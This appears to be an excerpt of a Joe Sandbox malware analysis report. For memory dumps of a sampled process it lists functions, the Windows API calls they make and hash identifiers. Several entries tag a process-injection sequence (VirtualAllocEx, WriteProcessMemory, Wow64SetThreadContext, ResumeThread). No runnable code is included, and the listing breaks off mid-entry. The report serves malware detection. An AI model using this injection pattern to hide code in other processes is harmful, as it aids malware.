                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: db0afdb9865227264f0cb9b42e496a4e54b9959dc3851f3873d1741bccccc40d
                                                • Instruction ID: a3281d7b32dc6d2fd72bbf7bfaaad40d69b31d20eb90cc37b108c250d58953e9
                                                • Opcode Fuzzy Hash: db0afdb9865227264f0cb9b42e496a4e54b9959dc3851f3873d1741bccccc40d
                                                • Instruction Fuzzy Hash: B641C2B0C00729CFDB24DFAAC884BDEBBB5BF49304F24806AD409AB255DB756945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016D58ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 05ce3ec4b3404c14713d6beca5695eabb92dd4825d722d8c61a277fa7e9802eb
                                                • Instruction ID: 975a03cb1b1f3f5205a7bb38bde4d0b7e1d088b1b951a192737b5c7b0462c21f
                                                • Opcode Fuzzy Hash: 05ce3ec4b3404c14713d6beca5695eabb92dd4825d722d8c61a277fa7e9802eb
                                                • Instruction Fuzzy Hash: B441D1B0C00729CFDB24CFAAC884BDDBBB5BF49304F24806AD409AB255DB756946CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DD3A1 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: dad2096446422909d6f865ea2c018d7c0adb2b6ed1d40e213dc4809e0286a70c
                                                • Instruction ID: d8a3d658b339e2e988f589db74fa51499f4e83537b45dbc129e24d5cca4b89f1
                                                • Opcode Fuzzy Hash: dad2096446422909d6f865ea2c018d7c0adb2b6ed1d40e213dc4809e0286a70c
                                                • Instruction Fuzzy Hash: BF314D79A403408FF7249FA0F95976A3BBAF788360F518069F9058B3D8DEB65901CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B786A Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 032B7900
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 11f714beae5090c303f4d400c56d5de9860cc111c874301dab37932a7493ef45
                                                • Instruction ID: 045301e245335ac4603c780a664f09adf8501256c95a6db631c69983926fa8fd
                                                • Opcode Fuzzy Hash: 11f714beae5090c303f4d400c56d5de9860cc111c874301dab37932a7493ef45
                                                • Instruction Fuzzy Hash: 63215AB19003599FCB10DFA9C841BDEBBF0FF48350F108429E959A7251C7749954CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B7958 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 032B79E0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 101e71f36ab20b9d39c53e86d99e4cde2918dd933e33be9de3b4aff98ce0100e
                                                • Instruction ID: 0ad76d89c7538332e8cdaadc1ddc469abdcefc538fe893a61c9e0569e3ce150e
                                                • Opcode Fuzzy Hash: 101e71f36ab20b9d39c53e86d99e4cde2918dd933e33be9de3b4aff98ce0100e
                                                • Instruction Fuzzy Hash: 3E2148B19007599FCB10DFAAC885BEEFBF4FF48320F10842AE559A7250C735A944CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B7870 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 032B7900
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: aded3f1da2a6cb1e1a4400c809a38fd4a9fbf6f619d1c74c042025a14eff1110
                                                • Instruction ID: a06765fc53527cb09577a9d2dfae2e8146fd6fdfea7c994dc7cbc751e7d1487d
                                                • Opcode Fuzzy Hash: aded3f1da2a6cb1e1a4400c809a38fd4a9fbf6f619d1c74c042025a14eff1110
                                                • Instruction Fuzzy Hash: B12139B1D003599FCB10CFA9C885BDEBBF5FF88310F108429E959A7250C7789994CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B76D0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 032B7756
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 297528414612968003c5162c82215457a97c156ea5b6b0070cc01d54d827791c
                                                • Instruction ID: 16d7d9f9ff8742a6545aedff1242213f9ef5d0ff2573ca77db931d45bdff9d50
                                                • Opcode Fuzzy Hash: 297528414612968003c5162c82215457a97c156ea5b6b0070cc01d54d827791c
                                                • Instruction Fuzzy Hash: F1216AB59002098FDB10DFAAC4857EEFBF4EF89320F14842AD459A7241C778A985CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B7960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 032B79E0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 1e2a2a1c5ec44be94ec135d230bda61d109006eb88ff867942f91542711a9585
                                                • Instruction ID: a9b2086beb78591d8870f3e0cab9532f659c307f27fe6d0070acc27f27808985
                                                • Opcode Fuzzy Hash: 1e2a2a1c5ec44be94ec135d230bda61d109006eb88ff867942f91542711a9585
                                                • Instruction Fuzzy Hash: 2F2139B1C003599FCB10DFAAC841AEEFBF5FF48310F508429E559A7250C7749544CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B76D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 032B7756
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: e7b81946c9d17f3dbc4076e58d1daf2d7057c22f2ab345782d5f96b6fda61889
                                                • Instruction ID: d89bed630b5431b4496efb44469c2f1029f698f56bda35fe6cf607e08b19034f
                                                • Opcode Fuzzy Hash: e7b81946c9d17f3dbc4076e58d1daf2d7057c22f2ab345782d5f96b6fda61889
                                                • Instruction Fuzzy Hash: 352138B19002098FDB10DFAAC4857EEFBF4EF88324F548429D459A7241CB78A985CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DD2E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 13f8da88bf641cbae6002825cc7dcdec487f74680833dfdbf90ad50f7f4757d8
                                                • Instruction ID: e520732d0cfa0a5a5f681655476ac8edbd1cdd5623a5e4ec108aba5fdb469302
                                                • Opcode Fuzzy Hash: 13f8da88bf641cbae6002825cc7dcdec487f74680833dfdbf90ad50f7f4757d8
                                                • Instruction Fuzzy Hash: 2321E3B5D00248EFDB10CFAAD984ADEBBF4EB48310F14801AE914A3350C374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DD2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016DD367
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4c695e1f3ec27fea9d3fa1eb515efa0322b633205dc506dc8360f379bca9203e
                                                • Instruction ID: 53b935c06849f181ba52b21eeac6a9ceaa258698e16f0d46616e9ab99f63ec98
                                                • Opcode Fuzzy Hash: 4c695e1f3ec27fea9d3fa1eb515efa0322b633205dc506dc8360f379bca9203e
                                                • Instruction Fuzzy Hash: 6A21E2B5D00208DFDB10CFA9D984ADEBBF4FB48320F14842AE958A7350D778A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B77AA Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 032B781E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4391db8211868845a395b1ad6825621febc0987e4c6b8ff8a7de3b72cc72ee03
                                                • Instruction ID: 3005d6bc5ba5af6f26257e3fbce73dcca969a602f6ada3cdc9757689fd3b8279
                                                • Opcode Fuzzy Hash: 4391db8211868845a395b1ad6825621febc0987e4c6b8ff8a7de3b72cc72ee03
                                                • Instruction Fuzzy Hash: E32156729002499FCB20CFA9D845BEEBFF1EF88324F248429E859A7250C7759944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DAF88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3D1,00000800,00000000,00000000), ref: 016DB5C2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 9867f28e96ffad232c8f33408127cffb044e8d7ad7c2fb44ff82307bbe144771
                                                • Instruction ID: 74f4dc9d7d6cd71aaa36200c0ed30e445842c4e18553142c6e7c07e3f32ce843
                                                • Opcode Fuzzy Hash: 9867f28e96ffad232c8f33408127cffb044e8d7ad7c2fb44ff82307bbe144771
                                                • Instruction Fuzzy Hash: E21114B6D002488FDB10CF9AD844AEEFBF4EB89310F54842AD919A7310C375A545CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B77B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 032B781E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a1c8bd6c4c637b2e4bc87cc6100dbcaa5d1934fe5bda6287f396979be52022c7
                                                • Instruction ID: 10e47232b916fbe7864a594311cb8fbdd62af37e7f2ba6316bca25284a86519c
                                                • Opcode Fuzzy Hash: a1c8bd6c4c637b2e4bc87cc6100dbcaa5d1934fe5bda6287f396979be52022c7
                                                • Instruction Fuzzy Hash: AB1167718002498FCB10DFAAD844BEEFFF5EF88320F108429E559A7250C775A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DB550 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3D1,00000800,00000000,00000000), ref: 016DB5C2
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 93a430fac6908a03f5d6a24a0b35fa098d16848c67441e0c52593a6c921ea72b
                                                • Instruction ID: d9ccf989fd7d95ef1a47947213c46726faf484af65520d71d3ba142c2b44ffe9
                                                • Opcode Fuzzy Hash: 93a430fac6908a03f5d6a24a0b35fa098d16848c67441e0c52593a6c921ea72b
                                                • Instruction Fuzzy Hash: 1C1123B6D002088FDB10CF9AD944ADEFBF4AB89310F14842AD919A7610C375A545CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B71EA Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 108a40fdb03214f7ccc607316b6acb1f87dc14393a5c916131c4670783af1833
                                                • Instruction ID: d1e35a2c20fa913623283e846527037e4ac5ea71e8012f9c5b85a3204ceadf42
                                                • Opcode Fuzzy Hash: 108a40fdb03214f7ccc607316b6acb1f87dc14393a5c916131c4670783af1833
                                                • Instruction Fuzzy Hash: 1F1128B19003498BCB20DFAAD4457EEFBF4EF88324F24842AD459A7250CB75A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B71F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: d311d016d09855170462465f7f6b94c36c86e8bbb6e0f26141b748e3c9bfa8e6
                                                • Instruction ID: 83122b8240fecf15da974b2acb48392b0855c09bf5932af9482c8ed22f1e94e5
                                                • Opcode Fuzzy Hash: d311d016d09855170462465f7f6b94c36c86e8bbb6e0f26141b748e3c9bfa8e6
                                                • Instruction Fuzzy Hash: CF113AB19003498FCB10DFAAC4457DEFBF4EF88324F248429D459A7250CB75A944CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016DAEF0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 016DAF56
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: bcb4f6cb151a7815d6bb7cef7ab79604ca2d83ca6df7e841fd2231ce9b042dfe
                                                • Instruction ID: 065e7f5b276dc441e006f5dafd8bc0ecd7d3da906d7111cca394cd387e8cfdd3
                                                • Opcode Fuzzy Hash: bcb4f6cb151a7815d6bb7cef7ab79604ca2d83ca6df7e841fd2231ce9b042dfe
                                                • Instruction Fuzzy Hash: 681110B5C002498FDB10DF9AC844ADEFBF4EB88320F10846AD869B7350C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032B92A0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 032BB0BD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 640cb5b0d8fd34ddc2c63b5e421e2e3d72d53a0aba6d3707ac7da224b2f3ee13
                                                • Instruction ID: 93b411c6598abbff8894029e47c054ad1c6d7f8fad52c9bb3731d2f9a28ac620
                                                • Opcode Fuzzy Hash: 640cb5b0d8fd34ddc2c63b5e421e2e3d72d53a0aba6d3707ac7da224b2f3ee13
                                                • Instruction Fuzzy Hash: 501125B58003499FCB20DF9AC484BEEBBF8EB48310F108419E915A7200D375A984CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032BB058 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 032BB0BD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1838631584.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_32b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 417f68b2f217e242a6d1bc96618ef5ae7515f2b3e44ed7ed55c6967b1cff6011
                                                • Instruction ID: d1a3b170abbca4f8df887d6e673877f1d2083e53f64a04aa8f7510f189d243ee
                                                • Opcode Fuzzy Hash: 417f68b2f217e242a6d1bc96618ef5ae7515f2b3e44ed7ed55c6967b1cff6011
                                                • Instruction Fuzzy Hash: 9A1106B5800349DFCB20DF99D445BEEBBF4EB48320F108419D958A7650C375A584CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A2CDC Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 1d3e1a42c0b94f8f9e3bf263d97869e26d4d15144ddc34224ffe306e27b4da45
                                                • Instruction ID: fa30558eba2274038bb8f1681bd654748bbc04b531d6c44f1939722cf43516d3
                                                • Opcode Fuzzy Hash: 1d3e1a42c0b94f8f9e3bf263d97869e26d4d15144ddc34224ffe306e27b4da45
                                                • Instruction Fuzzy Hash: EC51C071B0021A9FDB01DB79C88887EBBF6EFC52507148A6AE459DB3A1EB30DD058750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A8F69 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: 2768ec7f042b29de70915d4d31cd715886a1bed35c1127cf5e57d7eb59da8b39
                                                • Instruction ID: 18e4c4b4aff278798854934998644cec5dab1aa629741f99813dd7998829048c
                                                • Opcode Fuzzy Hash: 2768ec7f042b29de70915d4d31cd715886a1bed35c1127cf5e57d7eb59da8b39
                                                • Instruction Fuzzy Hash: 35418EB0A2560AEFDB44CF95D5848AEFFB2FBC9304F54C895D484A7328D7309A11CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A8F78 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                • Opcode ID: a5286431eb63a97cb2998e815be6426878af04fe8d7dfdefc1d7eb577b77e840
                                                • Instruction ID: 9fb5a28bd256c46a90e10f2e4a8715bbb319a488b9460849d97c5da7e7833d0e
                                                • Opcode Fuzzy Hash: a5286431eb63a97cb2998e815be6426878af04fe8d7dfdefc1d7eb577b77e840
                                                • Instruction Fuzzy Hash: D0415CB0E2460AEFDB44CF95D5858AEFFB2FB89244F60D895D445A7318DB309A20CB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A6DC9 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5
                                                • API String ID: 0-3899204960
                                                • Opcode ID: 9e2e9e3364a44726d52a5ce2490b65d93cf40c562041a986dcfef8a37e769bb2
                                                • Instruction ID: 0afa39d6248a37d813114f0b6a71544bbba0de59e53b2bbb64f5d39469c7cd64
                                                • Opcode Fuzzy Hash: 9e2e9e3364a44726d52a5ce2490b65d93cf40c562041a986dcfef8a37e769bb2
                                                • Instruction Fuzzy Hash: 902169B0E15209AFDB44CFA9C5405AEFBF1FF9A240F18C5AAD444E7351E7309A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A2CCC Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                • Opcode ID: 94e32a7075aed08a06159c03f662a07ac98c625f13af03ada7101f94495b4b76
                                                • Instruction ID: 2c59ef36b3051f608a9fb265b0b53505c6a311648cbd286f7a80604763a68a98
                                                • Opcode Fuzzy Hash: 94e32a7075aed08a06159c03f662a07ac98c625f13af03ada7101f94495b4b76
                                                • Instruction Fuzzy Hash: AC116DB1B0020A9BDB04EBB899405FEB6F2ABD4240F10452AC405E7244EB318E06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077AD63A Relevance: .2, Instructions: 177COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0927d8f9ac312ad488d870a3b260cf9c424fc490441e68349a899ac516bad3d2
                                                • Instruction ID: e2abc736198c495d5bfdcee43f99056d7bfcf8f991896156572ec639d6133c4c
                                                • Opcode Fuzzy Hash: 0927d8f9ac312ad488d870a3b260cf9c424fc490441e68349a899ac516bad3d2
                                                • Instruction Fuzzy Hash: FA61E1B0F40108AFE714DBA9D454BBE7AF2BBC5344F148566E19A9B6C9DB38C902CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A34EF Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a73749b8ecb4c409bf3922bdf0f111011acf3c77bd1e7778d198ed4d1dae6cf7
                                                • Instruction ID: 59b3e07cf1fdcdf30b450f50814c20c2354514907ae6ecc90baf3925048e2b13
                                                • Opcode Fuzzy Hash: a73749b8ecb4c409bf3922bdf0f111011acf3c77bd1e7778d198ed4d1dae6cf7
                                                • Instruction Fuzzy Hash: D551D2F0A18215EBEB14CF69C8416BEBBB1FBC6395F048727E5669B281D738D940CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A8E10 Relevance: .1, Instructions: 129COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21ebe9c0ea724811647ca05cdda02d8fb06056792f69271918eb8ae3ebdb8001
                                                • Instruction ID: 99ea016c21a390885489640b1c77d4ce17e1d82713f50d4bcdae634df6a1c676
                                                • Opcode Fuzzy Hash: 21ebe9c0ea724811647ca05cdda02d8fb06056792f69271918eb8ae3ebdb8001
                                                • Instruction Fuzzy Hash: 2D41ADB89197889FD706CB6AD440848BFB0EF8A215F1A85D7D4C4DB3A3D7349949CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A90F0 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
